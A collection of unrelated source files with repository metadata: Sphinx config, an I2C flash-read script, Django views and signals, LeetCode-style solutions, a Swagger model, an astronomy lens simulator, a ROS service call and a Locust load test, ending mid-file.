# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'saharaoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
    ('index', 'Sahara.tex', u'OpenStack Data Processing API Documentation',
     u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
|
[
"Wayne Gong@minbgong-winvm.cisco.com"
] |
Wayne Gong@minbgong-winvm.cisco.com
|
210609fb82f3bd44f14c0dc789314dd099ea2a0f
|
08c132bc63ebba2edebde139f7907953ae2fa04d
|
/Archived_Files/FTDI_Python_Libraries - SPI_MDIO_I2C/etc_i2c_flash.py
|
5dc8f62ab699ff7816ef920fa89870c54f41af85
|
[] |
no_license
|
hudkmr/Code_Database
|
12b60d1b331b91e9dc990d63bd4603bb92d0bfe7
|
d80751c13bd30114af70d690ef8fc1a0d6368490
|
refs/heads/master
| 2021-01-21T12:49:47.564408
| 2015-07-30T02:28:07
| 2015-07-30T02:28:07
| 39,899,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
# This Script Reads the Data from I2C Slave device(Flash memory) using FTDI MPSSE Engine
# NOTE(review): Python 2 syntax (`print RXACKBuf`) — kept byte-identical.
from etc_abb_i2c_lib import BB_I2C
from etc_abb_i2c_lib.etc_header import *
import sys
import time
# Open FTDI device 0 and configure bit-bang I2C.
d=BB_I2C(0)
d.DevConf(BAUD,DO_MASK_VAL,SYNC_MODE)
# TXACKBuf collects ACK bits for written bytes; RXACKBuf collects read data.
TXACKBuf=[]
RXACKBuf=[]
# Write phase: address 0x80 (write), register 0x00.
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,0)
TXACKBuf+=d.SendByte('00')
# Repeated start, then read two bytes (ACK the first, NAK the last).
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,1)
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
data = ['1','2','3','4','5','6','7','8']
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,0)
TXACKBuf+=d.SendByte(0x10)
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,1)
for i in range(7):
    RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
|
[
"hudkmr@gmail.com"
] |
hudkmr@gmail.com
|
117aa18bc9ed57ce6572e9120224d114fc632a6e
|
32e2e9ecd12d4eeaacc64d1a699672633501ea08
|
/find_a_midwife/views.py
|
142206c710eac207c0818e7371cb179f8e186912
|
[] |
no_license
|
BrianC68/wr_maternity
|
365098abb13d255348d2d57bf1c543cd698e6ae8
|
5392fdead32c5f79c7be9a4cb0397df26a5de915
|
refs/heads/master
| 2023-01-24T08:42:06.965179
| 2023-01-20T17:42:44
| 2023-01-20T17:42:44
| 233,097,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import ListView, DetailView
from .models import Midwife
class MidwifeListView(ListView):
    """List page showing every midwife."""

    template_name = 'midwife_list_view.html'
    model = Midwife
    context_object_name = 'midwives'

    def get_queryset(self):
        # Fetch only the columns the list template actually renders.
        base_queryset = super().get_queryset()
        return base_queryset.only('name', 'service_area', 'photo')
class MidwifeDetailView(DetailView):
    # Docstring fixed: this view shows a midwife, not a doula (copy-paste slip).
    '''Page that displays individual midwife details.'''
    template_name = 'midwife_detail_view.html'
    model = Midwife
    context_object_name = 'midwife'
|
[
"brianc@wi.rr.com"
] |
brianc@wi.rr.com
|
a8be8bddddc67ab30f266259012c32c14fe1bede
|
ce18cf6bdb1a85a65a509597b4c0ec046b855186
|
/2021年4月/接雨水.py
|
e3b2d4f6b80d4cf594dc6bc3a4110f902cfdb9c8
|
[] |
no_license
|
elssm/leetcode
|
e12e39faff1da5afb234be08e7d9db85fbee58f8
|
a38103d2d93b34bc8bcf09f87c7ea698f99c4e36
|
refs/heads/master
| 2021-06-11T06:44:44.993905
| 2021-04-28T06:14:23
| 2021-04-28T06:14:23
| 171,072,054
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,415
|
py
|
class Solution(object):
def trap(self, height):
"""
:type height: List[int]
:rtype: int
"""
if len(height) <= 1:
return 0
#两层循环时间复杂度太大了。不过思路没问题
# ans=0
# start=0
# end=0
# max_h = max(height)
# for i in range(1,max_h+1):
# for j in range(len(height)):
# if height[j]>=i:
# start=j
# break
# for k in range(len(height)):
# if height[len(height)-k-1]>=i:
# end=len(height)-k-1
# break
# for j in range(start+1,end):
# if height[j]<i:
# ans+=1
# return ans
#找到最大值
max_h = max(height)
#找到最大值的下标(第一个最大值)
index = height.index(max_h)
ans=0
temp=0
#从左到最大值遍历
for i in range(index):
if height[i]<height[temp]:
ans=ans+(height[temp]-height[i])
else:
temp=i
height=list(reversed(height[index:]))
temp2=0
for i in range(len(height)):
if height[i]<height[temp2]:
ans=ans+(height[temp2]-height[i])
else:
temp2=i
return ans
|
[
"noreply@github.com"
] |
elssm.noreply@github.com
|
69debec428098617652296bd578146c4657179a1
|
caf6ae544fce3b332b40a03462c0646a32c913e1
|
/master/python/swagger_client/models/deposit_id.py
|
9d6a813e681197d9448474fe5c7f2b9e39942158
|
[
"Apache-2.0"
] |
permissive
|
coinsecure/plugins
|
827eb0ce03a6a23b4819a618ee47600161bec1c7
|
ad6f08881020c268b530d5242d9deed8d2ec84de
|
refs/heads/master
| 2020-05-30T07:17:56.255709
| 2016-11-27T22:22:23
| 2016-11-27T22:22:23
| 63,496,663
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
# coding: utf-8
"""
Coinsecure Api Documentation
To generate an API key, please visit <a href='https://coinsecure.in/api' target='_new' class='homeapi'>https://coinsecure.in/api</a>.<br>Guidelines for use can be accessed at <a href='https://api.coinsecure.in/v1/guidelines'>https://api.coinsecure.in/v1/guidelines</a>.<br>Programming Language Libraries for use can be accessed at <a href='https://api.coinsecure.in/v1/code-libraries'>https://api.coinsecure.in/v1/code-libraries</a>.
OpenAPI spec version: 1.0b
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class DepositID(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.

    Model wrapping a single Coinsecure deposit identifier.
    """

    def __init__(self):
        """
        DepositID - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        # attribute name -> declared swagger type
        self.swagger_types = {
            'deposit_id': 'str'
        }
        # attribute name -> JSON key in the API definition
        self.attribute_map = {
            'deposit_id': 'depositID'
        }
        self._deposit_id = None

    @property
    def deposit_id(self):
        """
        Gets the deposit_id of this DepositID.

        :return: The deposit_id of this DepositID.
        :rtype: str
        """
        return self._deposit_id

    @deposit_id.setter
    def deposit_id(self, deposit_id):
        """
        Sets the deposit_id of this DepositID.

        :param deposit_id: The deposit_id of this DepositID.
        :type: str
        """
        self._deposit_id = deposit_id

    def to_dict(self):
        """
        Returns the model properties as a dict, recursing into nested
        models, lists and dicts via their own ``to_dict``.
        """
        result = {}
        # Modernized: dict.items() replaces the Python 2 six.iteritems shim.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal.

        Robustness fix: comparing against an unrelated type now returns
        False instead of raising AttributeError when the other object has
        no ``__dict__``.
        """
        if not isinstance(other, DepositID):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
[
"vivek0@users.noreply.github.com"
] |
vivek0@users.noreply.github.com
|
f038abaec86c975b455f314fe8312b6fb4f3a83f
|
37930870719caede967fdf6905c032e22d086e8b
|
/scripts/imaging/simulators/instruments/vro.py
|
0990c9c9733733002ed6eb4a3accc03e6b77e72d
|
[] |
no_license
|
Cywtim/autolens_workspace
|
cbede944c0f85ee95cd7362fee957ef77e701280
|
da40cafee8dc26e5d8b1041888fb280598e74a5e
|
refs/heads/master
| 2023-04-05T14:22:06.091992
| 2021-04-15T20:29:28
| 2021-04-15T20:29:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,170
|
py
|
"""
Simulator: VRO
==============
This script simulates `Imaging` of a strong lens where:
- The resolution, PSF and S/N are representative of the Vera Rubin Observatory imaging.
"""
# %matplotlib inline
# from pyprojroot import here
# workspace_path = str(here())
# %cd $workspace_path
# print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
"""
The `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_name`
gives it a descriptive name. They define the folder the dataset is output to on your hard-disk:
- The image will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/image.fits`.
- The noise-map will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/noise_map.fits`.
- The psf will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/psf.fits`.
"""
dataset_type = "instruments"
dataset_instrument = "vro"
"""
The path where the dataset will be output, which in this case is:
`/autolens_workspace/dataset/imaging/instruments/vro/mass_sie__source_sersic`
"""
dataset_path = path.join("dataset", "imaging", dataset_type, dataset_instrument)
"""
For simulating an image of a strong lens, we recommend using a Grid2DIterate object. This represents a grid of (y,x)
coordinates like an ordinary Grid2D, but when the light-profile`s image is evaluated below (using the Tracer) the
sub-size of the grid is iteratively increased (in steps of 2, 4, 8, 16, 24) until the input fractional accuracy of
99.99% is met.
This ensures that the divergent and bright central regions of the source galaxy are fully resolved when determining the
total flux emitted within a pixel.
"""
grid = al.Grid2DIterate.uniform(
shape_native=(100, 100), pixel_scales=0.2, fractional_accuracy=0.9999
)
"""
Simulate a simple Gaussian PSF for the image.
"""
psf = al.Kernel2D.from_gaussian(
shape_native=(21, 21), sigma=0.5, pixel_scales=grid.pixel_scales, normalize=True
)
"""
To simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,
noise levels and psf of the dataset that is simulated.
"""
simulator = al.SimulatorImaging(
exposure_time=100.0, psf=psf, background_sky_level=1.0, add_poisson_noise=True
)
"""
Setup the lens galaxy's mass (SIE+Shear) and source galaxy light (elliptical Sersic) for this simulated lens.
"""
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
"""
Use these galaxies to setup a tracer, which will generate the image for the simulated `Imaging` dataset.
"""
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
"""
Lets look at the tracer`s image, this is the image we'll be simulating.
"""
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid)
tracer_plotter.figures_2d(image=True)
"""
We can now pass this simulator a tracer, which creates the ray-traced image plotted above and simulates it as an
imaging dataset.
"""
imaging = simulator.from_tracer_and_grid(tracer=tracer, grid=grid)
"""
Lets plot the simulated `Imaging` dataset before we output it to fits.
"""
imaging_plotter = aplt.ImagingPlotter(imaging=imaging)
imaging_plotter.subplot_imaging()
"""
Output the simulated dataset to the dataset path as .fits files.
"""
imaging.output_to_fits(
image_path=path.join(dataset_path, "image.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
overwrite=True,
)
"""
Output a subplot of the simulated dataset, the image and a subplot of the `Tracer`'s quantities to the dataset path
as .png files.
"""
mat_plot_2d = aplt.MatPlot2D(
title=aplt.Title(label="Vero Rubin Observator Image"),
output=aplt.Output(path=dataset_path, format="png"),
)
imaging_plotter = aplt.ImagingPlotter(imaging=imaging, mat_plot_2d=mat_plot_2d)
imaging_plotter.subplot_imaging()
imaging_plotter.figures_2d(image=True)
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid, mat_plot_2d=mat_plot_2d)
tracer_plotter.subplot_tracer()
"""
Pickle the `Tracer` in the dataset folder, ensuring the true `Tracer` is safely stored and available if we need to
check how the dataset was simulated in the future.
This will also be accessible via the `Aggregator` if a model-fit is performed using the dataset.
"""
tracer.save(file_path=dataset_path, filename="true_tracer")
"""
The dataset can be viewed in the folder `autolens_workspace/imaging/instruments/vro`.
"""
|
[
"james.w.nightingale@durham.ac.uk"
] |
james.w.nightingale@durham.ac.uk
|
f5316c97b47c37037e7f7584f2ad11d62837711b
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Games/Minecraft/pip/tests/test_help.py
|
b5a5f8aaba7742dfff1f6d49f2ba7a46eab76da7
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:8a2ef4075a758034598401082ccea67056274e743bd8d3b71c91deb8be2b8201
size 1835
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
a92d28836676c2ebdd4e48ad6ba6b45f2ddd5ddd
|
fd0eecb6d4f12eb326030c2f64892c6845668c4f
|
/docs/files/ros-service-call-logger.py
|
69929603c94693f175fcbc0234197cc7350d0cb4
|
[
"MIT"
] |
permissive
|
gramaziokohler/roslibpy
|
599eff049caa72ca0f23dbc8e4058e051e66556b
|
55e8f396f9e7b5d5669f6a31c2ed8d9bc33c3400
|
refs/heads/main
| 2023-08-31T22:57:32.502924
| 2023-03-29T14:52:31
| 2023-03-29T14:52:31
| 119,359,521
| 245
| 58
|
MIT
| 2023-08-29T14:22:35
| 2018-01-29T09:13:24
|
Python
|
UTF-8
|
Python
| false
| false
| 333
|
py
|
import roslibpy
# Connect to a rosbridge server on the local machine (9090 is the
# rosbridge_websocket default port) and start the event loop.
client = roslibpy.Ros(host='localhost', port=9090)
client.run()
# Call the standard roscpp GetLoggers service exposed by the rosout node.
service = roslibpy.Service(client, '/rosout/get_loggers', 'roscpp/GetLoggers')
# GetLoggers takes no arguments, so the request payload stays empty.
request = roslibpy.ServiceRequest()
print('Calling service...')
# Blocking call; the response dict carries a 'loggers' field per the
# roscpp/GetLoggers service definition.
result = service.call(request)
print('Service response: {}'.format(result['loggers']))
# Close the connection and stop the client's event loop.
client.terminate()
|
[
"casas@arch.ethz.ch"
] |
casas@arch.ethz.ch
|
70b061e799152084ad6f729509a14852526468f9
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/PHY_604_Computational_Methods_in_Physics_and_Astrophysics_II_Zingale/code1/monte_carlo/uniform_random/random_test.py
|
f5d708344cd250ad2e460372c9cb612844584e80
|
[] |
no_license
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134
| 2023-08-14T10:05:37
| 2023-08-14T10:05:37
| 72,460,321
| 223
| 174
| null | 2022-10-24T12:15:06
| 2016-10-31T17:24:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 919
|
py
|
# Do a simple random number generator based on the linear congruential
# generator
import matplotlib.pyplot as plt
class Rand(object):
    """Minimal-standard linear congruential pseudo-random generator.

    Uses the Park-Miller parameters: multiplier a = 7**5 = 16807,
    increment c = 0, modulus M = 2**31 - 1.
    """

    def __init__(self, seed):
        # Generator state; advanced on every call to ran().
        self.seed = seed
        self.a = 16807  # 7**5
        self.c = 0
        self.M = 2147483647  # 2**31 -1

    def ran(self):
        """Advance the state and return the next float in [0, 1)."""
        state = (self.a * self.seed + self.c) % self.M
        self.seed = state
        # Dividing by M rather than M - 1 means 1.0 can never be returned,
        # so results fall in the half-open interval [0, 1).
        return state / float(self.M)
def test_random():
    """Scatter-plot successive pairs (x_i, x_{i+1}) of the LCG output.

    A good generator shows no visible structure; an LCG with poor
    parameters shows the classic lattice/stripe pattern.  Saves the
    figure to random.png in the working directory.
    """
    r = Rand(1)
    x = []
    for i in range(10000):
        x.append(r.ran())
    # make pairs out of successive points
    x1 = x[1:]
    x = x[:-1]
    plt.scatter(x, x1, s=5)
    plt.xlabel(r"$x_i$")
    plt.ylabel(r"$x_{i+1}$")
    plt.xlim(0,1)
    plt.ylim(0,1)
    plt.savefig("random.png", dpi=150)
if __name__ == "__main__":
test_random()
|
[
"me@yomama.com"
] |
me@yomama.com
|
ad8452aa80df9bf192b29494939440d87bd2230d
|
9a2b9a3873984e9f99cdc92be7d98af279fae36b
|
/app/users/locusts.py
|
c3021a34c5118e8f3272dba542cf12d9d34e453e
|
[] |
no_license
|
jeonyh0924/celery-test
|
4bf3832ef5e4175c7615051ccaefa131b65a01af
|
aad15232141d1f2ad69c5438030e9fcd707b6efa
|
refs/heads/master
| 2022-11-26T05:21:48.885913
| 2020-08-06T11:05:49
| 2020-08-06T11:05:49
| 284,411,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import random
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task
def index_page(self):
self.client.get("/health")
def on_start(self):
pass
|
[
"hungyb0924@gmail.com"
] |
hungyb0924@gmail.com
|
76c69c71e2615a87f13d8098ced49b2265c3c1e8
|
3490103f9c3773a717b37c3e6bedc88b9cd83cd2
|
/setup.py
|
dd45809284ae6bf607d2dff2a2b681e1afbcbacd
|
[] |
no_license
|
vuchau/django-project-template
|
66cd4bf08c4b61be53d8aaed5e34d48b54901682
|
2510e82d50a705429cda96d7912d5056313c29b9
|
refs/heads/master
| 2021-01-18T08:05:53.465031
| 2015-01-24T22:12:12
| 2015-01-24T22:12:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
from setuptools import setup
from distutils.core import Command
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from django.conf import settings
settings.configure(
DATABASES={
'default': {
'NAME': ':memory:',
'ENGINE': 'django.db.backends.sqlite3'
}
},
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'toolbox',
)
)
from django.core.management import call_command
call_command('test', 'toolbox')
setup(
name='django-project-template',
cmdclass={'test': TestCommand}
)
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
a1e6e1348803e6d405076ffca4ed431681dfba1a
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02781/s238378799.py
|
717eeb5e77e1996b57354ee94c94ba90683c2808
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,263
|
py
|
#!/usr/bin/env python3
#%% for atcoder uniittest use
import sys
# Fast input: strip the trailing newline from each stdin line.
input= lambda: sys.stdin.readline().rstrip()
sys.setrecursionlimit(10**9)
# Helpers: parse one whitespace-separated line into ints (map/tuple/list).
def pin(type=int):return map(type,input().split())
def tupin(t=int):return tuple(pin(t))
def lispin(t=int):return list(pin(t))
#%%code
def resolve():
    """Digit DP (AtCoder ABC154-like): count integers in [1, N] that
    contain exactly K non-zero digits, reading N and K from stdin."""
    N=input()
    K,=pin()
    #degit DP
    # dp_table[index][smaller][cond] = number of prefixes satisfying
    # cond := "exactly k non-zero digits so far"; `smaller` is 1 once the
    # prefix is strictly below N's prefix (so remaining digits are free).
    rb=(0,1)
    dp_table=[[[0 for cnd in range(K+1)]for sml in rb]for ind in range(len(N)+1)]
    dp_table[0][0][0]=1
    #print(dp_table)
    #print("degit,sml,k,prove,l,x<n,dp_table[degit-1][sml][k]")#
    for degit in range(len(N)+1):
        n=int(N[degit-1])
        for sml in rb:
            # When still tight (sml == 0) the digit may not exceed N's digit.
            t=10 if sml else int(N[degit-1])+1
            for k in range(K+1):
                for prove in range(t):
                    x=prove
                    try:#Indexerror
                        #print(degit,sml,k,prove,"l",x<n,dp_table[degit-1][sml][k])
                        #if sml==False and x==n:print(n,":")
                        # k+(x!=0) may overflow K+1 -> IndexError, deliberately ignored.
                        dp_table[degit][sml or x<n][k+(x!=0)]+=dp_table[degit-1][sml][k]
                    except :pass
    # Answer: tight prefixes equal to N itself plus all strictly smaller ones.
    print(dp_table[-1][0][K]+dp_table[-1][1][K])
    #print(dp_table)
#%%submit!
resolve()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e117f4ebaad212623fc1ca4c75b0ce427a5091d7
|
501d029b5db8132feb1877f5e0898af7a301c910
|
/ex3_1.py
|
360851c26a0bb82dc626470c97dff2bdb4d8a0da
|
[] |
no_license
|
Everfighting/Learn-Python-the-Hard-Way
|
092b050d53bfca0f5bbc91e41ba1aacce2880cc1
|
51723bfc22472284b3902161627331882f0dbc6f
|
refs/heads/master
| 2020-04-05T22:55:02.550343
| 2017-08-22T06:13:36
| 2017-08-22T06:13:36
| 61,793,170
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
# coding=utf-8
import math
# Compute 5 squared using math.pow from the math module (returns a float).
print math.pow(5,2)
# Compute 5 squared with the built-in exponentiation operator (returns an int).
print 5**2
# Floor division: in Python 2, dividing two ints with / keeps only the
# integer part.  In Python 3.0+ the / operator returns a float and
# // is the floor-division operator.
print 5/3
|
[
"cbb903601682@163.com"
] |
cbb903601682@163.com
|
eff753209513dfc927dc91a5466b6ddf7519166d
|
98364abec1f798ed6352a1c0eda080371aacb28d
|
/Medium/729/729.py
|
fa51d5f4b2ef64dd9ed676a463da821bf4475276
|
[] |
no_license
|
GuoYunZheSE/Leetcode
|
3d1b11d142734922acecf7ba5efbaf0f2ab26d81
|
45cabf05251711c6421c8c2ddbcc3fec9222f70a
|
refs/heads/master
| 2022-05-01T05:03:20.694729
| 2022-04-27T04:10:33
| 2022-04-27T04:10:33
| 161,486,806
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
import bisect
class MyCalendar:
    """Calendar accepting a booking [start, end) only when it does not
    overlap any previously accepted booking (LeetCode 729).

    Implementation: a sorted list of start times (`self.arr`) plus a map
    start -> end (`self.dict`).  Each `book` costs O(log n) for the
    binary search and O(n) for the sorted insert.

    Change: removed the large block of commented-out first-attempt code
    (an interval-merging approach that was abandoned) and documented the
    retained implementation.
    """

    def __init__(self):
        self.arr = []   # booked start times, kept sorted
        self.dict = {}  # start time -> end time

    def book(self, start: int, end: int) -> bool:
        """Try to add the half-open event [start, end); True on success."""
        # An identical start time always overlaps the existing booking.
        if start in self.dict:
            return False
        if not self.arr:
            self.arr.append(start)
            self.dict[start] = end
            return True
        i = bisect.bisect_left(self.arr, start)
        # The predecessor event must end at or before our start.
        if i - 1 >= 0 and self.dict[self.arr[i - 1]] > start:
            return False
        # The successor event must begin at or after our end.
        if i < len(self.arr) and self.arr[i] < end:
            return False
        self.arr.insert(i, start)
        self.dict[start] = end
        return True
if __name__ == '__main__':
    # Ad-hoc smoke test: [48, 50) is accepted first; [0, 6) does not
    # overlap it, so this prints True.
    S=MyCalendar()
    S.book(48,50)
    print(S.book(0,6))
|
[
"guoyunzhe.se@gmail.com"
] |
guoyunzhe.se@gmail.com
|
f5b80ad74e9f4b8489d21edb746c9938cea79745
|
43f3b7e4a5b7a1210ffa72c5a855d7542d68290d
|
/Results/Python/Array/134.py
|
69581275b8fe467b583b69841182a4af0fcb49ac
|
[] |
no_license
|
bar2104y/Abramyan_1000_tasks
|
38e86e119245db4bac0483583cc16d8793d5689c
|
e0bf9f5e73d90b8eca3fe5ba7913ed12f18d989a
|
refs/heads/master
| 2021-06-05T18:05:09.788453
| 2020-06-30T19:52:31
| 2020-06-30T19:52:31
| 150,898,700
| 5
| 2
| null | 2018-10-02T17:16:28
| 2018-09-29T20:01:33
|
Python
|
UTF-8
|
Python
| false
| false
| 569
|
py
|
import math
from genarr import genRandomArr
x,y = [], []
# Number of points to generate; coordinates are random in [-10, 10].
n = int(input("N: "))
# Manual-entry variant kept for reference:
# for i in range(n):
#     x.append(int(input("X: ")))
#     y.append(int(input("Y: ")))
x,y = genRandomArr(n,-10,10), genRandomArr(n,-10,10)
def distanse(x1,y1,x2,y2):
    """Return the Euclidean distance between points (x1, y1) and (x2, y2)."""
    dx = x2 - x1
    dy = y2 - y1
    return math.sqrt(dx * dx + dy * dy)
maxd = 0
# Brute-force O(n^2) search for the most distant pair of points.
# NOTE(review): if n < 2 the inner loop never runs, leaving ii/jj
# undefined and the final print raises NameError — confirm n >= 2.
for i in range(len(x)):
    print((x[i],y[i]))
    for j in range(i+1,len(x)):
        d = distanse(x[i],y[i],x[j],y[j])
        if d > maxd:
            ii,jj = i,j
            maxd = d
# Report the farthest pair and (recomputed) maximal distance.
print((x[ii],y[ii]), (x[jj],y[jj]), distanse(x[ii],y[ii], x[jj],y[jj]))
|
[
"bar2104y@yandex.ru"
] |
bar2104y@yandex.ru
|
92addd01fb60c32929e5a515f5a438f96f32715b
|
560c5d8226d74969c3fb467efd1d26178562e15c
|
/blog_api/users/signals.py
|
dcc3fa9d8133adbb65fc08daa0e17af6aee7ccfc
|
[
"MIT"
] |
permissive
|
beasyx0/blog_api
|
17f47fb1537d4b7e53822bbff507740363d909cc
|
8d984ee3f9b2b7ea35a847013743f236a1a67fdb
|
refs/heads/main
| 2023-06-30T02:08:40.190270
| 2021-08-04T02:09:53
| 2021-08-04T02:09:53
| 358,662,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
from django.contrib.auth.signals import user_logged_in # user_logged_out, user_login_failed
from django.db.models import signals
from django.dispatch import Signal
from django.db import transaction
from django.dispatch import receiver
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.contrib.auth import get_user_model
User = get_user_model()
from blog_api.users.models import User, VerificationCode, PasswordResetCode
@receiver(signals.post_save, sender=User)
def send_user_verification_email_signal(sender, instance, created, **kwargs):
    '''Send user a verification email on first save.'''
    # Only on creation, not on subsequent updates of the same user.
    if created:
        code = VerificationCode.objects.create(user_to_verify=instance)
        # Defer sending until the surrounding transaction commits, so the
